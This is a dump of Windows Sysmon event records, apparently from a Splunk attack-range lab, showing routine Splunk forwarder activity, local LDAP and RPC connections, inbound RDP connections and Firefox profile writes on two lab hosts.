Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C87BF7B391B528DC2E4B193EF80E1C4,SHA256=AEBFE8AA77BAB760A39E9719DCB26A9A2CE079FA00195FFA7B30061307660C11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806946Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:52.182{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=372E7F42A0A0CD7B178CD154ADE1718A,SHA256=98E73755C0EA787AEF3139D8EB74E36FFA02A6305429873A86365AF7079272E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:52.325{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BB503081A0B7112BD43CBB7793EFF6D8,SHA256=2B2E1889AD9AA1EB0822FF24439988C0260585D7154EF6AB46E953B9C015043A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:52.188{466BC892-F3E3-60EB-107D-00000000CF01}31404796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001047628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:45.272{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50975-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001047627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:45.272{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50975-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001047626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:45.260{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50974-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001047625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:45.260{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50974-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001047624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:45.240{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50973-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001047623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:45.240{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50973-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 10341000x80000000000000001047622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:53.571{466BC892-F3E5-60EB-127D-00000000CF01}68801724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:53.539{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62E8866F591403C1864F71DF7D8ACD46,SHA256=0FA9D98C56E0FB21036BCFAD9162670E9ACFD51020BF07C0F75C1015F57682E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806948Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:51.330{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57220-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806947Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:53.197{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F60362FAAFD2EDDF55ED13F1E0DEB7D4,SHA256=926903550AF2BCD2E7862B80A97751B817161B65B27EEF56440CF416900C20A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:53.439{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6429F6FE18BDB3E6E57251B2CC99C3AD,SHA256=D78BB15DE4FB71C0C4FA0DC2009598BC47DCD6801211523F6F6414FF560E7ADF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:53.340{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3E5-60EB-127D-00000000CF01}6880C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:53.340{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:53.340{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:53.340{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:53.340{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:53.324{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F3E5-60EB-127D-00000000CF01}6880C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:53.324{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3E5-60EB-127D-00000000CF01}6880C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:53.319{466BC892-F3E5-60EB-127D-00000000CF01}6880C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001047639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:45.691{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-39588-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 354300x80000000000000001047638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:45.670{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50976-false10.0.1.12-8000- 23542300x80000000000000001047637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:54.554{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ECA3360DDFE0444331B2B252F852BA4,SHA256=F7D06A31EFCC885507DD2EE6DFEC3B555374D40E287441B6FB75C678EA8193C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806949Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:54.219{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FB43AA85163BB36C187583DF35C45E3,SHA256=86287320798AEB78AD0ED2195488E189D9BE43C7E7C23115236AF9D0C23FEAA2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:54.023{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3E6-60EB-137D-00000000CF01}4652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:54.023{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:54.023{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:54.023{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:54.023{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:54.023{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F3E6-60EB-137D-00000000CF01}4652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:54.023{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3E6-60EB-137D-00000000CF01}4652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:54.013{466BC892-F3E6-60EB-137D-00000000CF01}4652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001047653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:47.386{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-49417-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001047652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=58DE94B69948D998DC79B8D7621A69CA,SHA256=679951D43ACE098577BFC5D61A381A9BCEED9F3007B655C69F03236DA79FFF35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=82B8FFBB0FED0185E58465CCC1646C57,SHA256=D0FF8D05D5E196F3703FDA78DF5842C3D59C970FE9B66DA024384B4D9F9D0C7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3E567EB64C5D803A95CDA5693B13FF0A,SHA256=F46C5CDC00D2B197CA4C4E6FF726AA75579CE91DA7A3089482CB333290E0B703,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=6555AEBABFB541221F8FA2F0F78EA93B,SHA256=A85F6B6419C5D58AEDFDDF6663B075D4B0003A59EC32C38B85A58167090D35EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 